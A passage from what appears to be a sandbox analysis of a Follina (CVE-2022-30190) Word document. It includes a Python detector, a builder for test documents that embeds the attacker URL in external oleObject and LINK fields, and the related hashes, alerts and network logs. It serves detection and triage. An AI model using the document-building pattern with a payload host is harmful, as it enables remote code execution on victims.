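                # instrText of a field before matching; this example matches raw XML.
                text = zf.read(name).decode("utf-8", "replace")
                for m in LINK_FIELD.finditer(text):
                    findings.append({"part": name, "kind": "link-field", "target": m.group(1)})
    return findings


def build_sample_docx(target: str) -> bytes:
    """Constructed minimal .docx for the demonstration (not the report's sample):
    one benign hyperlink relationship, one external oleObject relationship and
    one LINK htmlfile field, the latter two pointing at `target`."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
        f'<Relationships xmlns="{REL_NS}">\n'
        f'  <Relationship Id="rId1" Type="{HYPERLINK_REL}" Target="https://example.com/" TargetMode="External"/>\n'
        f'  <Relationship Id="rId2" Type="{OLE_REL}" Target="{target}" TargetMode="External"/>\n'
        '</Relationships>'
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">\n'
        f'  <w:body><w:p><w:r><w:instrText>LINK htmlfile "{target}" "" \\p \\f 0</w:instrText></w:r></w:p></w:body>\n'
        '</w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/_rels/document.xml.rels", rels)
        zf.writestr("word/document.xml", document)
    return buf.getvalue()


# URL string copied from the dropped-file preview in the report; used only as a pattern.
FOLLINA_TARGET = "http://baza-novostei.name/dir/info/priny/t.html!"
BENIGN_TARGET = "https://example.com/page.html"   # no trailing '!', must not alert

if __name__ == "__main__":
    for hit in scan_docx(build_sample_docx(FOLLINA_TARGET)):
        print(hit)
    print("benign findings:", scan_docx(build_sample_docx(BENIGN_TARGET)))
```

        Run against a real file with scan_docx(open(path, "rb").read()). The two checks are complementary: the relationship check catches the usual oleObject rel (often with an mhtml: prefix, which still ends in ".html!"), while the field-code check catches the LINK htmlfile variant recorded in the dropped file above. Both are indicators for triage, not proof of exploitation; the rest of the chain is what the msdt Yara hits and the Snort alert below cover.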
        File type:Microsoft OOXML
        Entropy (8bit):7.711564536070913
        TrID:
        • Word Microsoft Office Open XML Format document (49504/1) 49.01%
        • Word Microsoft Office Open XML Format document (43504/1) 43.07%
        • ZIP compressed archive (8000/1) 7.92%
        File name:MuUeMZphCk.docx
        File size:11537
        MD5:cda4155d33b715f31315a9247d56ed3d
        SHA1:7a495ae1b4c9132d0afb9b058e049cc71c5a5a55
        SHA256:62243a041c28b5f98f0d29780250bf83e61a85523ddce855745f94d381006615
        SHA512:6002e4fc8fab8178f49e30635fb7926326b516f56b3123e9b6e689231c25cb98486ac9367095ea32d45367d74f5401a2ce5ce934f324aa0ef209348e7273dcfc
        SSDEEP:192:bhM1fkUU8hdb8d9264wpl7Z/c+8poF1d3jvvtlhoGheNrGxjPOuaj81s:1mfkz8hdbg92hwRcfa7pr1laGANyxjPK
        TLSH:13325C37852A1C3CD61F4B34E23CC686E49A8647B11BBD9BB60097A2C6C39C82D79F45
        File Content Preview:PK.........A=V...lT... .......[Content_Types].xmlUT....o.c.o.cux................j.0.E.....6.J.(.....e.h...4NDeIh&...8NC)i.M.1.3..3...x].l..m....}....X?+...9.....F.....@1.]_.......c).D.^J.s...!..J.R.._.LF.?...M..+u...rj<.h...Z8.....%I.Pd.mc.U....Z....._)..
        Icon Hash:e4e6a2a2a4b4b4a4
        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
        01/30/23-16:38:59.237228 | TCP | 2036726 | ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) | 443 | 49176 | 195.201.110.47 | 192.168.2.22
        Timestamp | Source Port | Dest Port | Source IP | Dest IP
        Jan 30, 2023 16:38:53.394267082 CET | 49171 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:53.417531967 CET | 80 | 49171 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:53.417711973 CET | 49171 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:53.417987108 CET | 49171 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:53.441041946 CET | 80 | 49171 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:53.441082954 CET | 80 | 49171 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:53.441215992 CET | 49171 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:54.687328100 CET | 49172 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:54.710592031 CET | 80 | 49172 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:54.710834980 CET | 49172 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:54.711050987 CET | 49172 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:54.734273911 CET | 80 | 49172 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:54.734345913 CET | 80 | 49172 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:54.735491037 CET | 49173 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:54.735562086 CET | 443 | 49173 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:54.735647917 CET | 49173 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:54.747786045 CET | 49173 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:54.747834921 CET | 443 | 49173 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:54.852899075 CET | 443 | 49173 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:54.853111029 CET | 49173 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:54.864320993 CET | 49173 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:54.864340067 CET | 443 | 49173 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:54.864917040 CET | 443 | 49173 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:54.939670086 CET | 49172 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:54.957336903 CET | 80 | 49172 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:54.957565069 CET | 49172 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:55.070719957 CET | 443 | 49173 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:55.070919991 CET | 49173 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:55.119185925 CET | 49173 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:55.119219065 CET | 443 | 49173 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:55.142942905 CET | 443 | 49173 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:55.143026114 CET | 443 | 49173 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:55.143157005 CET | 49173 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:55.143218994 CET | 49173 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:55.143240929 CET | 443 | 49173 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:58.790441036 CET | 49174 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:58.813038111 CET | 80 | 49174 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:58.813203096 CET | 49174 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:58.813340902 CET | 49174 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:58.836319923 CET | 80 | 49174 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:58.836354017 CET | 80 | 49174 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:58.836942911 CET | 49175 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:58.836999893 CET | 443 | 49175 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:58.837066889 CET | 49175 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:58.838871956 CET | 49175 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:58.838891983 CET | 443 | 49175 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:58.902235031 CET | 443 | 49175 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:58.902399063 CET | 49175 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:58.914844036 CET | 49175 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:58.914865017 CET | 443 | 49175 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:58.915324926 CET | 443 | 49175 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:58.952275038 CET | 49175 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:58.952305079 CET | 443 | 49175 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.003062010 CET | 443 | 49175 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.003206968 CET | 443 | 49175 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.003424883 CET | 49175 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.003900051 CET | 49175 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.003942013 CET | 443 | 49175 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.042727947 CET | 49174 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.045788050 CET | 49171 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.064165115 CET | 80 | 49174 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.064320087 CET | 49174 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.078620911 CET | 80 | 49171 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.078855991 CET | 49171 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.096642971 CET | 49176 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.096708059 CET | 443 | 49176 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.096796036 CET | 49176 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.101285934 CET | 49176 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.101311922 CET | 443 | 49176 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.152400017 CET | 443 | 49176 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.152554035 CET | 49176 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.173438072 CET | 49176 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.173465014 CET | 443 | 49176 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.173885107 CET | 443 | 49176 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.173948050 CET | 49176 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.204113960 CET | 49176 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.204132080 CET | 443 | 49176 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.237323046 CET | 443 | 49176 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.237380981 CET | 443 | 49176 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.237494946 CET | 443 | 49176 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.237567902 CET | 49176 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.237596989 CET | 49176 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.239999056 CET | 49176 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.240031958 CET | 443 | 49176 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.282567024 CET | 49171 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.309516907 CET | 80 | 49171 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.309597969 CET | 49171 | 80 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.310352087 CET | 49177 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.310408115 CET | 443 | 49177 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.310482979 CET | 49177 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.310832024 CET | 49177 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.310851097 CET | 443 | 49177 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.363852024 CET | 443 | 49177 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.363992929 CET | 49177 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.380295038 CET | 49177 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.380322933 CET | 443 | 49177 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.382600069 CET | 49177 | 443 | 192.168.2.22 | 195.201.110.47
        Jan 30, 2023 16:38:59.382625103 CET | 443 | 49177 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.445380926 CET | 443 | 49177 | 195.201.110.47 | 192.168.2.22
        Jan 30, 2023 16:38:59.445483923 CET | 443 | 49177 | 195.201.110.47 | 192.168.2.22
        Timestamp | Source Port | Dest Port | Source IP | Dest IP
        Jan 30, 2023 16:38:53.323796034 CET | 55868 | 53 | 192.168.2.22 | 8.8.8.8
        Jan 30, 2023 16:38:53.352087021 CET | 53 | 55868 | 8.8.8.8 | 192.168.2.22
        Jan 30, 2023 16:38:54.603615999 CET | 49688 | 53 | 192.168.2.22 | 8.8.8.8
        Jan 30, 2023 16:38:54.626416922 CET | 53 | 49688 | 8.8.8.8 | 192.168.2.22
        Jan 30, 2023 16:38:54.631133080 CET | 58836 | 53 | 192.168.2.22 | 8.8.8.8
        Jan 30, 2023 16:38:54.685975075 CET | 53 | 58836 | 8.8.8.8 | 192.168.2.22
        Jan 30, 2023 16:38:58.725426912 CET | 50134 | 53 | 192.168.2.22 | 8.8.8.8
        Jan 30, 2023 16:38:58.769660950 CET | 53 | 50134 | 8.8.8.8 | 192.168.2.22
        Jan 30, 2023 16:38:58.772041082 CET | 55275 | 53 | 192.168.2.22 | 8.8.8.8
        Jan 30, 2023 16:38:58.789683104 CET | 53 | 55275 | 8.8.8.8 | 192.168.2.22
        Jan 30, 2023 16:38:59.534842968 CET | 59915 | 53 | 192.168.2.22 | 8.8.8.8
        Jan 30, 2023 16:38:59.557145119 CET | 53 | 59915 | 8.8.8.8 | 192.168.2.22
        Jan 30, 2023 16:38:59.561460018 CET | 54408 | 53 | 192.168.2.22 | 8.8.8.8
        Jan 30, 2023 16:38:59.584151030 CET | 53 | 54408 | 8.8.8.8 | 192.168.2.22
        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
        Jan 30, 2023 16:38:53.323796034 CET | 192.168.2.22 | 8.8.8.8 | 0x271 | Standard query (0) | baza-novostei.name | A (IP address) | IN (0x0001) | false
        Jan 30, 2023 16:38:54.603615999 CET | 192.168.2.22 | 8.8.8.8 | 0x7509 | Standard query (0) | baza-novostei.name | A (IP address) | IN (0x0001) | false
        Jan 30, 2023 16:38:54.631133080 CET | 192.168.2.22 | 8.8.8.8 | 0xdc0 | Standard query (0) | baza-novostei.name | A (IP address) | IN (0x0001) | false
        Jan 30, 2023 16:38:58.725426912 CET | 192.168.2.22 | 8.8.8.8 | 0xf2ca | Standard query (0) | baza-novostei.name | A (IP address) | IN (0x0001) | false
        Jan 30, 2023 16:38:58.772041082 CET | 192.168.2.22 | 8.8.8.8 | 0xdc64 | Standard query (0) | baza-novostei.name | A (IP address) | IN (0x0001) | false
        Jan 30, 2023 16:38:59.534842968 CET | 192.168.2.22 | 8.8.8.8 | 0xd768 | Standard query (0) | baza-novostei.name | A (IP address) | IN (0x0001) | false
        Jan 30, 2023 16:38:59.561460018 CET | 192.168.2.22 | 8.8.8.8 | 0xe2ab | Standard query (0) | baza-novostei.name | A (IP address) | IN (0x0001) | false
        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
        Jan 30, 2023 16:38:53.352087021 CET | 8.8.8.8 | 192.168.2.22 | 0x271 | No error (0) | baza-novostei.name | | 195.201.110.47 | A (IP address) | IN (0x0001) | false
        Jan 30, 2023 16:38:54.626416922 CET | 8.8.8.8 | 192.168.2.22 | 0x7509 | No error (0) | baza-novostei.name | | 195.201.110.47 | A (IP address) | IN (0x0001) | false
        Jan 30, 2023 16:38:54.685975075 CET | 8.8.8.8 | 192.168.2.22 | 0xdc0 | No error (0) | baza-novostei.name | | 195.201.110.47 | A (IP address) | IN (0x0001) | false
        Jan 30, 2023 16:38:58.769660950 CET | 8.8.8.8 | 192.168.2.22 | 0xf2ca | No error (0) | baza-novostei.name | | 195.201.110.47 | A (IP address) | IN (0x0001) | false
        Jan 30, 2023 16:38:58.789683104 CET | 8.8.8.8 | 192.168.2.22 | 0xdc64 | No error (0) | baza-novostei.name | | 195.201.110.47 | A (IP address) | IN (0x0001) | false
        Jan 30, 2023 16:38:59.557145119 CET | 8.8.8.8 | 192.168.2.22 | 0xd768 | No error (0) | baza-novostei.name | | 195.201.110.47 | A (IP address) | IN (0x0001) | false
        Jan 30, 2023 16:38:59.584151030 CET | 8.8.8.8 | 192.168.2.22 | 0xe2ab | No error (0) | baza-novostei.name | | 195.201.110.47 | A (IP address) | IN (0x0001) | false
        • baza-novostei.name
        No statistics
        Target ID:0
        Start time:16:38:13
        Start date:30/01/2023
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13fe30000
        File size:1423704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        No disassembly